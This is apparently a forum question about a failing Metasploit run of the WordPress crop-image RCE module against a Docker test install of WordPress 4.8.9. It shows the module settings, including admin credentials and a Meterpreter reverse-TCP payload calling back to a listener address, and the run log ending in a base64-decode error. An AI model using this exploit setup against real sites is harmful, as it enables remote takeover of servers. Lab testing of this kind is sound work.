So. I am having some issues at metasploit.
I am trying to exploit
I am using Docker, in order to install wordpress version: 4.8.9.
PHP 7.2.12 (cli) (built: Nov 28 2018 22:58:16) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
with Zend OPcache v7.2.12, Copyright (c) 1999-2018, by Zend Technologies
wordpress version: 4.8.9
Module options (exploit/multi/http/wp_crop_rce): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD password1234 yes The WordPress password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 172.17.0.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 8000 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application USERNAME admin yes The WordPress username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.91.130 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 WordPress
Should be run without any error and meterpreter session will open.
Current behavior -> Can’t find Base64 decode error.
[+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload [+] Image uploaded [*] Including into theme [-] **Exploit aborted due to failure: not-found: Can't find base64 decode on target** [*] Exploit completed, but no session was created.
Source: Ask PHP